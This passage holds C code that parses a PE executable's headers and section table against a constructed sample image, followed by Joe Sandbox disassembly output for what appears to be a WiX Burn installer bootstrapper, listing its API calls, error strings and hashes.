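                    uint32_t *raw_off, uint32_t *raw_size)
{
    const uint8_t *p;
    if (!read_at(img, len, 0, DOS_HEADER_SIZE, &p)) return 0;
    if (rd16(p) != 0x5A4D) return 0;                     /* "MZ" */
    uint32_t e_lfanew = rd32(p + 0x3C);
    if (!read_at(img, len, e_lfanew, PE_SIG_FILEHDR, &p)) return 0;
    if (rd32(p) != 0x00004550) return 0;                 /* "PE\0\0" */
    uint16_t nsec     = rd16(p + 6);                     /* NumberOfSections */
    uint16_t opt_size = rd16(p + 20);                    /* SizeOfOptionalHeader */
    size_t sect_tbl = (size_t)e_lfanew + PE_SIG_FILEHDR + opt_size;
    for (uint16_t i = 0; i < nsec; i++) {
        if (!read_at(img, len, sect_tbl + (size_t)i * SECTION_HDR_SIZE, SECTION_HDR_SIZE, &p))
            return 0;                                    /* truncated section table */
        char sname[9] = {0};
        memcpy(sname, p, 8);                             /* Name is 8 bytes, not NUL-terminated */
        if (strncmp(sname, name, 8) == 0) {
            *raw_size = rd32(p + 16);                    /* SizeOfRawData */
            *raw_off  = rd32(p + 20);                    /* PointerToRawData */
            return 1;
        }
    }
    return 0;
}

/* Constructed sample image (assumption for the example): PE32, two sections. */
#define SAMPLE_IMAGE_SIZE 0x200
#define SAMPLE_E_LFANEW   0x80
#define SAMPLE_OPT_SIZE   0xE0   /* IMAGE_OPTIONAL_HEADER32 */

static void put_section(uint8_t *p, const char *name, uint32_t raw_size, uint32_t raw_off) {
    memset(p, 0, SECTION_HDR_SIZE);
    memcpy(p, name, strlen(name));
    wr32(p + 16, raw_size);
    wr32(p + 20, raw_off);
}

size_t build_sample_image(uint8_t *buf, size_t cap) {
    if (cap < SAMPLE_IMAGE_SIZE) return 0;
    memset(buf, 0, SAMPLE_IMAGE_SIZE);
    wr16(buf, 0x5A4D);                                   /* e_magic "MZ" */
    wr32(buf + 0x3C, SAMPLE_E_LFANEW);                   /* e_lfanew */
    uint8_t *nt = buf + SAMPLE_E_LFANEW;
    wr32(nt, 0x00004550);                                /* "PE\0\0" */
    wr16(nt + 4, 0x014C);                                /* Machine = i386 */
    wr16(nt + 6, 2);                                     /* NumberOfSections */
    wr16(nt + 20, SAMPLE_OPT_SIZE);                      /* SizeOfOptionalHeader */
    wr16(nt + PE_SIG_FILEHDR, 0x10B);                    /* optional header Magic = PE32 */
    uint8_t *sec = nt + PE_SIG_FILEHDR + SAMPLE_OPT_SIZE; /* section table at 0x178 */
    put_section(sec, ".text", 0x200, 0x400);
    put_section(sec + SECTION_HDR_SIZE, ".rsrc", 0x100, 0x600);
    return SAMPLE_IMAGE_SIZE;
}

/* Builds the sample image, optionally truncated, and returns the named
 * section's PointerToRawData, or 0xFFFFFFFF when the lookup fails. */
uint32_t sample_section_raw_offset(const char *name, size_t truncate_to) {
    static uint8_t img[SAMPLE_IMAGE_SIZE];
    size_t len = build_sample_image(img, sizeof img);
    if (truncate_to && truncate_to < len) len = truncate_to;
    uint32_t off = 0, size = 0;
    return pe_find_section(img, len, name, &off, &size) ? off : 0xFFFFFFFFu;
}

int main(void) {
    printf(".text raw offset: 0x%X\n", sample_section_raw_offset(".text", 0));
    printf(".rsrc raw offset: 0x%X\n", sample_section_raw_offset(".rsrc", 0));
    printf("truncated image:  0x%X\n", sample_section_raw_offset(".text", 0x100));
    return 0;
}
```

The truncated lookup matters for triage of a bootstrapper like this one: a loader that trusts NumberOfSections or e_lfanew without the bounds check that read_at performs will read past the end of a short or crafted file, which is exactly why the report shows a GetLastError call after every seek and read.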
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0087B502
                                                            • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B550
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0087B556
                                                            • ReadFile.KERNELBASE(00000000,00874461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B59E
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0087B5A4
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B601
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B607
                                                            • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B650
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B656
                                                            • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B6C7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B6CD
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B716
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B71C
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B765
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B76B
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B7B7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B7BD
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B810
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B872
                                                            • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B8FC
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B906
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                            • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                            • API String ID: 3411815225-695169583
                                                            • Opcode ID: 0882074c665805cce5f44d39bcc7ccf7a32031dc4517d4c4e71f2950b04d429f
                                                            • Instruction ID: 3063238d8ea8269993203c296bba4681c3527b245dae8e0d8fcd5b84a6de0852
                                                            • Opcode Fuzzy Hash: 0882074c665805cce5f44d39bcc7ccf7a32031dc4517d4c4e71f2950b04d429f
                                                            • Instruction Fuzzy Hash: 0012B372940635ABDB209A548C46FEA7A65FB04720F1181A5FE1CFB385E774DD408BD2

                                                            Control-flow Graph (rendered graph not included)
                                                            APIs
                                                            • SetEvent.KERNEL32(?,?,?,?,?,008908BC,?,?), ref: 00890D25
                                                            • GetLastError.KERNEL32(?,?,?,?,008908BC,?,?), ref: 00890D2F
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,008908BC,?,?), ref: 00890D74
                                                            • GetLastError.KERNEL32(?,?,?,?,008908BC,?,?), ref: 00890D7F
                                                            • ResetEvent.KERNEL32(?,?,?,?,?,008908BC,?,?), ref: 00890DB7
                                                            • GetLastError.KERNEL32(?,?,?,?,008908BC,?,?), ref: 00890DC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                            • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 1865021742-2104912459
                                                            • Opcode ID: 93f750e0101d6c85013b773761c47c1629070fbd433b52ffba292175f35606de
                                                            • Instruction ID: 39bf482948d24abb46546cbc2e7ca09586a7e02f622594fb7f8a8624d68fe870
                                                            • Opcode Fuzzy Hash: 93f750e0101d6c85013b773761c47c1629070fbd433b52ffba292175f35606de
                                                            • Instruction Fuzzy Hash: 3A910737985A37ABDF3536A94D4EF2A2960FB00B24F154324BE24FA6C0D775DC409AD2

                                                            Control-flow Graph (rendered graph not included)
                                                            APIs
                                                              • Part of subcall function 008733C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008710DD,?,00000000), ref: 008733E8
                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F40
                                                            • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F4F
                                                            • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F5E
                                                            • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F69
                                                            Strings
                                                            • D, xrefs: 00874EA9
                                                            • burn.filehandle.attached, xrefs: 00874E17
                                                            • Failed to append original command line., xrefs: 00874E69
                                                            • Failed to launch clean room process: %ls, xrefs: 00874EF7
                                                            • burn.clean.room, xrefs: 00874DDE
                                                            • Failed to get path for current process., xrefs: 00874D83
                                                            • Failed to wait for clean room process: %ls, xrefs: 00874F23
                                                            • engine.cpp, xrefs: 00874EEA
                                                            • Failed to allocate full command-line., xrefs: 00874E8E
                                                            • burn.filehandle.self, xrefs: 00874E45
                                                            • Failed to cache to clean room., xrefs: 00874DC2
                                                            • -%ls="%ls", xrefs: 00874DE6
                                                            • Failed to append %ls, xrefs: 00874E1C
                                                            • %ls %ls, xrefs: 00874E55
                                                            • "%ls" %ls, xrefs: 00874E7A
                                                            • Failed to allocate parameters for unelevated process., xrefs: 00874DFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$FileModuleName
                                                            • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                            • API String ID: 3884789274-2391192076
                                                            • Opcode ID: 2c3020a41e24c4383b5770c0151e64c6ac7ec84346d838e413e1c509721f5985
                                                            • Instruction ID: 3ffffe827acbb8e7d062af8ffe6d4b38038019f41864070aea7c4548e0ded37d
                                                            • Opcode Fuzzy Hash: 2c3020a41e24c4383b5770c0151e64c6ac7ec84346d838e413e1c509721f5985
                                                            • Instruction Fuzzy Hash: CF717532D40629ABCF219A98CC45EEFBB78FF04720F109255F928F6255DB74DA418B91

                                                            Control-flow Graph (rendered graph not included)
                                                            Strings
                                                            • Failed to parse command line., xrefs: 00887667
                                                            • WixBundleElevated, xrefs: 008876A5, 008876B6
                                                            • Failed to load catalog files., xrefs: 0088780F
                                                            • Failed to initialize variables., xrefs: 00887571
                                                            • Failed to get manifest stream from container., xrefs: 008875CC
                                                            • Failed to load manifest., xrefs: 008875E8
                                                            • Failed to open manifest stream., xrefs: 008875AB
                                                            • Failed to set source process path variable., xrefs: 00887709
                                                            • WixBundleUILevel, xrefs: 008876D6, 008876E7
                                                            • WixBundleOriginalSource, xrefs: 00887759
                                                            • WixBundleSourceProcessPath, xrefs: 008876F8
                                                            • Failed to get source process folder from path., xrefs: 00887725
                                                            • Failed to initialize internal cache functionality., xrefs: 0088779F
                                                            • WixBundleSourceProcessFolder, xrefs: 00887734
                                                            • Failed to open attached UX container., xrefs: 0088758E
                                                            • Failed to set original source variable., xrefs: 0088776A
                                                            • Failed to overwrite the %ls built-in variable., xrefs: 008876BB
                                                            • Failed to get unique temporary folder for bootstrapper application., xrefs: 008877CE
                                                            • Failed to extract bootstrapper application payloads., xrefs: 008877EF
                                                            • Failed to set source process folder variable., xrefs: 00887745
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                            • API String ID: 32694325-1564579409
                                                            • Opcode ID: f1d4913265d492f05e03a77d85586bf8d4c921ba9c31b6637ded02afaf88c16b
                                                            • Instruction ID: 9279115c5528e15a30329add5f3f62e54859d71254d62467d7f10c0c70b6cc17
                                                            • Opcode Fuzzy Hash: f1d4913265d492f05e03a77d85586bf8d4c921ba9c31b6637ded02afaf88c16b
                                                            • Instruction Fuzzy Hash: 46A1A372E4461ABADB12AAA4CC85FEEB77CFB14700F204226F615E7241D734E944CBA5

                                                            Control-flow Graph (rendered graph not included)
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00874DBC,?,?,00000000,00874DBC,00000000), ref: 00888713
                                                            • GetLastError.KERNEL32 ref: 00888720
                                                              • Part of subcall function 008B3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008B3F73
                                                            • SetFilePointerEx.KERNEL32(00000000,008BB4B8,00000000,00000000,00000000,?,00000000,008BB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008887CD
                                                            • GetLastError.KERNEL32 ref: 008887D7
                                                            • CloseHandle.KERNELBASE(00000000,?,00000000,008BB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00888902
                                                            Strings
                                                            • cache.cpp, xrefs: 00888744, 008887FB, 00888862, 008888D1
                                                            • Failed to create engine file at path: %ls, xrefs: 00888751
                                                            • cabinet.dll, xrefs: 0088887B
                                                            • Failed to update signature offset., xrefs: 00888821
                                                            • Failed to seek to signature table in exe header., xrefs: 0088886C
                                                            • msi.dll, xrefs: 00888814
                                                            • Failed to seek to checksum in exe header., xrefs: 00888805
                                                            • Failed to zero out original data offset., xrefs: 008888F4
                                                            • Failed to seek to original data in exe burn section header., xrefs: 008888DB
                                                            • Failed to seek to beginning of engine file: %ls, xrefs: 00888779
                                                            • Failed to copy engine from: %ls to: %ls, xrefs: 008887A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                            • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                            • API String ID: 3456208997-1976062716
                                                            • Opcode ID: fa8f9b225552fc198a73a05c7c2ca1e9d0908a1c7a5faeabef1cd98b6419076f
                                                            • Instruction ID: 67495af3bbbb14794c64ca62e03e2684542e5cc757c0439347e9957862e6f04f
                                                            • Opcode Fuzzy Hash: fa8f9b225552fc198a73a05c7c2ca1e9d0908a1c7a5faeabef1cd98b6419076f
                                                            • Instruction Fuzzy Hash: F6515372A41626EAD7127A548C46FBF7A68FF04B10F514239FE10FB281EB64DC0197E6

                                                            Control-flow Graph: function blocks 87762c-877edf (entry block calls InitializeCriticalSection); interactive graph and executed/not-executed legend not rendered
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(0088756B,008753BD,00000000,00875445), ref: 0087764C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                            • API String ID: 32694325-3635313340
                                                            • Opcode ID: cc88731a415eb16392594ffc75a9d9eeeb015f2671e19581ad68de301e060850
                                                            • Instruction ID: 542208424d819c6a665722b0dfeb0de75939ef840d44529b5c59ced28da24846
                                                            • Opcode Fuzzy Hash: cc88731a415eb16392594ffc75a9d9eeeb015f2671e19581ad68de301e060850
                                                            • Instruction Fuzzy Hash: 823247B0C116299BDB65CF9AC9887CDFAB4FB49304F9081EED24CA6311D7B05B888F55

                                                            Control-flow Graph: function blocks 8882ba-8884aa (calls GetCurrentProcess, GetWindowsDirectoryW, GetTempPathW, UuidCreate, StringFromGUID2); interactive graph and executed/not-executed legend not rendered
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00875489), ref: 00888310
                                                              • Part of subcall function 008B0879: OpenProcessToken.ADVAPI32(?,00000008,?,008753BD,00000000,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B0897
                                                              • Part of subcall function 008B0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08A1
                                                              • Part of subcall function 008B0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B092B
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00888336
                                                            • GetLastError.KERNEL32 ref: 00888340
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 008883BD
                                                            • GetLastError.KERNEL32 ref: 008883C7
                                                            • UuidCreate.RPCRT4(?), ref: 00888406
                                                            Strings
                                                            • cache.cpp, xrefs: 00888364, 008883EB, 0088843C
                                                            • Failed to convert working folder guid into string., xrefs: 00888446
                                                            • Failed to concat Temp directory on windows path for working folder., xrefs: 008883AD
                                                            • Failed to create working folder guid., xrefs: 00888413
                                                            • Failed to get temp path for working folder., xrefs: 008883F5
                                                            • Failed to copy working folder path., xrefs: 0088848B
                                                            • Failed to get windows path for working folder., xrefs: 0088836E
                                                            • Failed to ensure windows path for working folder ended in backslash., xrefs: 0088838B
                                                            • Temp\, xrefs: 00888395
                                                            • Failed to append bundle id on to temp path for working folder., xrefs: 00888470
                                                            • %ls%ls\, xrefs: 00888458
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                            • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                            • API String ID: 266130487-819636856
                                                            • Opcode ID: 87ccef35836d875d2761a2a63cff8565485125654ebed42190fa7f716ab3f3f5
                                                            • Instruction ID: 6f33f10273790de382e486d0a16bcfc4f0a2617b104110184d079a979a7f88f0
                                                            • Opcode Fuzzy Hash: 87ccef35836d875d2761a2a63cff8565485125654ebed42190fa7f716ab3f3f5
                                                            • Instruction Fuzzy Hash: AC41B473A4172AE7D730A6A48C49F9A73A8FB04B10F504265BA08F7341EA78DD0447E6

                                                            Control-flow Graph: function blocks 8910fb-8913b0 (calls CoInitializeEx, SetEvent, WaitForSingleObject, ResetEvent, CoUninitialize); interactive graph and executed/not-executed legend not rendered
                                                            APIs
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0089111D
                                                            • CoUninitialize.COMBASE ref: 00891398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 3442037557-1168358783
                                                            • Opcode ID: 8cecb2e3401c4f6e734811ba80bef9dfc10276c5fad0f24c8b345f7c3067e37e
                                                            • Instruction ID: a753149498950b44addb0e9661c765370ebe405bc665e62def1c8f4b68ab57b7
                                                            • Opcode Fuzzy Hash: 8cecb2e3401c4f6e734811ba80bef9dfc10276c5fad0f24c8b345f7c3067e37e
                                                            • Instruction Fuzzy Hash: E3513A36A88167EB8F21B7D44C0DE6F3674FB41720B2E4369BD21FB790D6689C0096D6

                                                            Control-flow Graph: function blocks 8742d7-8744d0 (calls InitializeCriticalSection, lstrlenW, CompareStringW); interactive graph and executed/not-executed legend not rendered
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00875266,?,?,00000000,?,?), ref: 00874303
                                                            • InitializeCriticalSection.KERNEL32(000000D0,?,?,00875266,?,?,00000000,?,?), ref: 0087430C
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00875266,?,?,00000000,?,?), ref: 00874352
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00875266,?,?,00000000,?,?), ref: 0087435C
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00875266,?,?,00000000,?,?), ref: 00874370
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00875266,?,?,00000000,?,?), ref: 00874380
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00875266,?,?,00000000,?,?), ref: 008743D0
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00875266,?,?,00000000,?,?), ref: 008743DA
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00875266,?,?,00000000,?,?), ref: 008743EE
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00875266,?,?,00000000,?,?), ref: 008743FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                            • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                            • API String ID: 3039292287-3209860532
